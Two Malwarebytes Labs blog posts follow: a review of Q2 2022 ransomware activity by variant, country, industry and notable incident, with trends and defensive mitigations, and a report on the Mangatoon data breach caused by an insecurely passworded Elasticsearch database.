To understand how we got here, let’s first take a closer look at recent statistics on the top ransomware variants, countries and industries attacked. Next, we’ll evaluate noteworthy attacks month-by-month before discussing whether it’s worth paying the ransom in today’s climate. In addition, we’ll examine current trends to deduce what businesses might expect from ransomware authors in the months to come. Finally, we’ll review mitigation tactics that businesses of all sizes can adopt to keep ransomware at bay.

Top ransomware variants

LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place. However, the Conti gang suffered severe setbacks in the wake of its public declaration of support for Russia and subsequent data leaks of its source code, and the group quietly dismantled operations while keeping up appearances. Three groups alleged to be linked to Conti’s disbandment—Black Basta, ALPHV, and Hive—eventually overtook Conti in ransomware distribution by the end of May.

Here’s how the top variants ranked by total number of spring incidents:

1. LockBit: 263
2. Conti: 127
3. Black Cat/ALPHV: 68
4. Hive: 40
5. Black Basta: 33*

*Black Basta launched in April, so its tally is one month less than the others.

Top countries

The United States was by far the most attacked country this spring, with 290 reported ransomware events. Its cyberattack count far surpassed the next two highest countries (Germany and the UK) combined, with the former reporting 48 ransomware incidents and the latter 41.

Here are the top five countries impacted by ransomware this spring:

1. United States: 290
2. Germany: 48
3. UK: 41
4. Italy: 38
5. Canada: 31

Top industries

Perhaps it might be easier to create a list of industries that weren’t impacted by ransomware in Q2. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.

In fact, the FBI warned the food and agriculture sector (specifically farmers’ co-ops) this April about potential ransomware attacks during critical planting and harvesting seasons that could result in operational disruptions to the supply chain, which could then lead to food shortages. The previous month, HP Hood Dairy suffered a ransomware attack, which was likely behind its Lactaid brand going missing from shelves in early April.

Here’s how the top five industries ranked by number of ransomware attacks this spring:

1. Services: 171
2. Manufacturing: 76
3. Technology: 65
4. Utilities: 61
5. Retail: 50

Noteworthy March attacks

March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised. Lapsus$, the criminal enterprise behind Samsung’s infiltration, leaked 190 GB of data and source code reportedly from the Galaxy smart phone, as well as confidential information from Qualcomm.

The most active ransomware variant was LockBit, which registered 97 attacks in March alone, including a hit on tire company Bridgestone Americas that caused the organization to disconnect many of its Latin and North American manufacturing and retreading facilities from the corporate network.

Hive ransomware, a RaaS launched in June 2021, was also busy in March. The group attacked Romania’s petroleum provider, demanding a multi-million dollar ransom and forcing the company to shut down its websites and Fill&Go services at gas stations. Hive also compromised a California healthcare nonprofit later in the month.

Noteworthy April attacks

April stood out as the month when three new dangerous RaaS variants, thought to be Conti-affiliated were introduced: Onyx, Mindware, and Black Basta. Conti still had some bite left, however, with 43 reported attacks that month. Among them were industrial giant Parker Hannifin and American automotive tools manufacturer Snap-on, as well as Panasonic’s Canadian operations, from which Conti claimed to have stolen 2.8 GB of data.

Newcomer Black Basta, who carried out 11 attacks in April, made headlines when it compromised German wind turbine company Deutsche Windtechnik and the American Dental Association, which was forced to take affected systems offline. The organization suffered disruptions to online services, telephones, email, and webchat, as well as personal data leaked on its members.

Onyx ransomware, meanwhile, launched with only six attacks in April, but they were deadly. The malware doesn’t just lock up systems and data—it destroys any file larger than 2 MB. Mindware also made a splashy April debut with double extortion threats and 13 attacks, including a Minnesota-based mental health provider from which it pilfered sensitive patient information.

The award for most data stolen in April goes to the Stormous criminal gang, who bragged about an assault resulting in 161 GBs exfiltrated from Coca-Cola without the company knowing. Reports say the Russian-linked threat actors later put it up for sale for 16 million Bitcoin or $640,000.

To add insult to injury, REvil (aka Sodonokibi) appeared to return in April with new payloads and a fresh leak blog featuring a mixture of recent and old victims. The threat actors have been linked to numerous high-profile ransomware incidents, including arguably the biggest ransomware attack of all time—a supply-chain hit on Kaseya in July 2021 believed to have affected over 1,000 businesses.

Noteworthy May attacks

In May, government and education were some of the hardest hit verticals, while attacks on Indian airline SpiceJet and farming equipment maker AGCO made the most headlines globally. Black Basta was reportedly behind the AGCO infiltration, which disrupted production of harvesters, tractors, and other business operations. The Austrian state of Carinthia also made the news when the BlackCat gang disrupted their systems and demanded a ransom of $5 million.

Despite strong evidence of a slow-down in activity—just 12 reported incidents in May—Conti made a showy display with a massive, sustained attack against Costa Rica that resulted in its new president declaring a state of emergency on May 8. On the same day, an inflammatory message appeared on the group’s leak site alongside 672 GB of stolen data. In response, the US Department of State offered a $10 million reward for information leading to individuals holding key leadership positions within Conti.

In other May government attacks, the town of Quincy, Massachusetts, had its information service systems compromised. They paid $500,000 for a decryption key and an additional $150,000 for security consultants to assist with the investigation. A ransomware attack in New Jersey’s Somerset County disrupted services and forced employees to shut down computers and create temporary Gmail accounts to ensure the public could still email key departments. The attack marked the 22nd US state or local government to be hit by ransomware in 2022, according to analysts at Recorded Future.

In education, several colleges and K–12 districts were crippled by ransomware. Kellogg Community College in Michigan was forced to cancel classes and close campuses due to a ransomware attack. On May 13, Lincoln College in Illinois permanently closed its doors after 157 years due to the combined effects of the pandemic and a major ransomware incident—a first in ransomware history.

Not to be outdone, LockBit set a steady pace in May with 73 attacks. Thought to have strong ties with Russia, the cybercriminals compromised the Bulgarian Refugee Agency and threatened to release sensitive files. Nearly 230,000 Ukrainian refugees have entered Bulgaria since the start of the war. LockBit was also behind May strikes against electronics manufacturer Foxcomm, the Rio de Janeiro finance department, and one of the largest library services in Germany.

New ransomware trends

In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. As a combined result of the increase in big game hunting (BGH) and remote/hybrid work, threat actors have been encountering ever more complex security infrastructures and a wider variety of devices and platforms.

To penetrate and encrypt as many systems as possible, some threat groups have started writing ransomware code using cross-platform programming languages like Python, Rust, or Golang. This allows the malware to run on different combinations of operating systems and architectures. Both BlackCat and Conti affiliates have been observed distributing versions of their variants for Linux as well as Windows. Developing in a cross-platform language also makes analyzing the malware more difficult for security researchers.

In attack methods, ransomware authors—while still favoring good old-fashioned social engineering—have started backing away from phishing emails and leaning toward exploiting server, software, and operating system vulnerabilities instead. In fact, unpatched vulnerabilities are now the primary vector for ransomware attacks, according to a report by IT software company Ivanti.

Last year, Ivanti identified 65 new vulnerabilities known to have been exploited in ransomware attacks—a number representing nearly one quarter of all vulnerabilities used to drop the threat in the history of its existence. There were 39 percent more vulnerabilities used for ransomware attacks in 2021 than in the previous year, and 2022 is shaping up to be even more tumultuous. From January to May 2022, 22 new vulnerabilities associated with ransomware were found, and all but one are considered critical or high-risk.

What do these trends mean for the year ahead? Cross-platform ransomware has the potential to infect even more systems, some (like Linux) that lack robust anti-ransomware protections. Coding ransomware in this way could eventually take down all endpoints, including IoT and personal devices, in a single blow, rendering recovery operations incredibly difficult—if not outright impossible. Automatic data backups to offsite and/or segmented servers will be key in keeping businesses operational in case of breach.

Meanwhile, ransomware operators are moving to swiftly weaponize vulnerabilities. The average time to exploit is now within eight days of the vulnerability being published by a vendor. That means organizations will need to prioritize patching vulnerabilities associated with ransomware, as well as according to criticality and against their own risk appetites.

To pay or not to pay

As ransomware attacks have evolved in sophistication and impact, so too have their ransom demands. Ransoms were 36 percent higher in 2021 than in 2020 at an average of $6.1 million. Yet by spring of 2022, many ransomware authors had whittled away at any sense of trust businesses might have had that by paying the ransom, they’ll receive what’s promised.

In 2020, gangs such as Conti, REvil, and Maze published stolen data even if the ransom was paid. Others took the ransom and never returned the files. By 2021, only 8 percent of those who paid the ransom actually got their files back. At that point, 83 percent of successful attacks featured double or triple extortion schemes. According to a Proofpoint study, 60 percent of participants who opted to negotiate with their attackers ended up having to pay ransom more than once.

By spring 2022, ransomware gangs showed no sense of responsibility toward their victims. RaaS operations, which now dominate the ransomware landscape, tend to be short-lived (therefore reputation isn’t important), and renegade affiliates often fail to follow their operator’s directions. When ransom demands bust the budget, data is not returned or is leaked regardless, and paying up puts a target on your back, it’s probably best to pocket the millions and get to work on mitigations.

Ransomware mitigations

To stave off potential future attacks—especially in an era of political and economical instability—the following actions are recommended:

• Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Make sure these copies are not accessible for modification or deletion from any system where the original data lives.
• Administer network segmentation so that all machines on your network are not accessible from every other machine.
• Install updates/patches to operating systems, software and firmware as soon as they are released.
• Install and regularly update endpoint security software on all devices—including those used in work-from-home capacities—and enable real-time detection.
• Audit user accounts with administrative privileges and configure access controls with the least privilege in mind. Implement multifactor authentication (MFA) for additional credential security.
• Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor for any unusual activity.

For ransomware reviews by the Malwarebytes Threat Intel team, check out the following:

• March ransomware review
• April ransomware review
• May ransomware review
• June ransomware review

Be ready and resilient in advance of ransomware attacks. Learn more.

Malwarebytes’ CEO Marcin Kleczynski started the Byte into Security newsletter to provide readers with candid takeaways—and practical solutions—for the most pressing security topics of the day. Subscribe to get the CEO perspective sent straight to your inbox!

The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

The hugely popular Manga comics platform Mangatoon has fallen victim to a data breach. No fewer than 23 million user accounts could be at risk, thanks to a poorly secured database. Worse still, Mangatoon doesn’t seem to be responding to messages from the breacher, or people notifying it that the breach has taken place.

A limited edition run of exposed accounts

Mangatoon allows comics fans to read a variety of web comics for free via the app, with the option to “unlock” whole comics for a fee. Unfortunately for Mangatoon, its Elasticsearch database was compromised leading to several attempts to get its attention.

No response was forthcoming by email or even social media. While it’s possible everyone involved is too busy fixing the problem, the complete lack of a reply is concerning.

Checking for exposure

The breach data, which occurred in May, has been loaded into popular breach checking service Have I been pwned.

You can search for your email address on that site, and if your mail is tied to any data breaches (not just Mangatoon), the site will let you know which sites, what data, and when it was breached.

Password disasters of our time

The 23 million or so accounts have been exposed purely because of bad password management. All of this data was, incredibly, sitting behind the “password”.

Mangatoon changed the password after the system breacher notified it. However, no customers have been notified and anyone unaware would think everything is currently business as usual. The truth is that things couldn’t be further from the case. Are there other, similarly poorly secured databases? Has the password been changed to something that isn’t “password123”?

Elasticsearch makes use of a variety of security features for all manner of configurations, so will Mangatoon be making use of these in future?

So many unanswered questions in a situation such as this isn’t massively reassuring.

Lock down your databases

Poorly secured Elasticsearch databases are juicy targets for those up to no good. At least 450 ransom notes were discovered demanding payment in return for files found on Elasticsearch databases back in June of this year. Sadly for anyone paying up to recover the stolen files, there’s a good chance the attackers had already deleted them. This is, of course, a valuable reminder to back up your data.

This is especially true considering Elasticsearch sits alongside both Redis and MongoDB as some of 2022’s top exposed databases.

If you use Mangatoon you should change your password to your account now. If you’ve used the same username and password combination on other accounts, you should change those too.

The post Insecure password leads to Mangatoon data breach appeared first on Malwarebytes Labs.